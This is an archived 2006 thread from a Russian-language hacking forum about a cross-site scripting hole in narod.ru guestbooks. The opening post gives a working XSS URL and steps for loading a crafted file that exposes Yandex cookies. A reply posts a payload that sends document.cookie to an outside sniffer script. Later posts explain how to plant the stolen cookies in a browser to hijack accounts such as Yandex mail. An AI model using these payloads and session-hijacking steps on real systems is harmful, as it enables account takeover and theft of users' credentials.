ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Xss народ.ру
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Xss народ.ру
  #1  
Старый 05.10.2006, 10:38
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию Xss народ.ру
Не знаю было это или нет... Вообщем читаемс...

1. _http://www.narod.ru/guestbook/?owner=49329156&mainhtml=%3Cscript%3Ealert()%3C/script%3E
2. Создали себе сайт с гостевой книгой...
Создайем на сайте файл - text.txt

Зайходим в сорцы нашей гесты, копирусем все и вставляем в text.txt...

Теперь надо нам просто добавить скрипт - ловушку, я добавил просто
<script>alert(document.cookie);</script>...

Правим сцылку... Первоночально сцылка на гесту показывает нам, что гостевуха в домене narod.ru, а значит там нам не будет показываться полные куки...
Ну дык какая хрен разница? Исправим ейе на narod.yandex.ru...

Теперь а чтоже делать с text.txt? Добавляем к ссылке на гесту &mainhtml=text.txt

Теперь заходим по этой ссылке и видимс наши печенюшки =)))

Извиняюсь, если это уже где то было... =))))

Вот моя геста = _http://www.narod.yandex.ru/guestbook/?owner=49329156&mainhtml=text.txt

Скажу сразу там нет снифера! =))))
 

  #2  
Старый 05.10.2006, 16:41
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
Провел на форуме:
354022

Репутация: 29
Отправить сообщение для Murt@zaa с помощью ICQ
По умолчанию
Все круто но вот вопрос как примерно сделаь чтобы кукисы на сниффер отсылались? и еще, сижу я в мастерской и открываю твою ссылку мне выдаются кукисы моей страницы на народе. А если в это время сидеть в ящике от yandexa то выдадутся кукисы от ящика???
 

  #3  
Старый 05.10.2006, 16:43
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Цитата:
yandexa то выдадутся кукисы от ящика???
Да! =)

Цитата:
как примерно сделаь чтобы кукисы на сниффер отсылались?
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
 

  #4  
Старый 05.10.2006, 16:51
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
Провел на форуме:
354022

Репутация: 29
Отправить сообщение для Murt@zaa с помощью ICQ
По умолчанию
Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???
 

  #5  
Старый 05.10.2006, 16:55
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682

Репутация: 641
Отправить сообщение для D=P=CH= MOD= с помощью ICQ
По умолчанию
Цитата:
Так как у меня ящика на яндексе нет задам еще вопрос куда вставлять полученные куки? в строку браузера ? типа id= *****полученные куки***** ???
Нет в строку браузера вобще то только сессию можно подставить.
Куки подмени в текстовом файле, там где все твои куки. (пример: C:\Documents and Settings\...\Cookies)
Или если там пароль не зашифрован, то просто впиши его.
 

  #6  
Старый 05.10.2006, 16:58
Murt@zaa
Новичок
Регистрация: 27.08.2006
Сообщений: 24
Провел на форуме:
354022

Репутация: 29
Отправить сообщение для Murt@zaa с помощью ICQ
По умолчанию
D=p=ch= Mod= Спасибо что напомнил! Помню читал где то давно, а щас забыл голова то дырявая. Ну че юзаем по тихоньку Xss
 

  #7  
Старый 05.10.2006, 16:59
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Если ты пользователь Оперы, то заходи Инструменты->Дополнительно->Cookies...
Находи домен яндекса и меняй значения... =))
 

  #8  
Старый 05.10.2006, 19:29
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию
баян, было где-то с полгода назад. хсс глупость там есть вещи помощнее.
 

  #9  
Старый 05.10.2006, 19:51
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Цитата:
хсс глупость там есть вещи помощнее
SQL? PHPinj? Чеж не пользуешься? Или не продаж? Богатым станешь... Мы пока еще дети нам учиться и учиться...
 

  #10  
Старый 17.10.2006, 22:32
ground_zero
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме:
1594033

Репутация: 216


По умолчанию
необессутьте что вмешался но хотелосьбы продолжения темы чо там за штука помощьней ?
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
ФЛУД НА НАРОД.РУ Egazar Чаты 0 05.10.2005 09:15
Взлом чатов на народ.ру JamesBond Чаты 14 18.02.2005 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ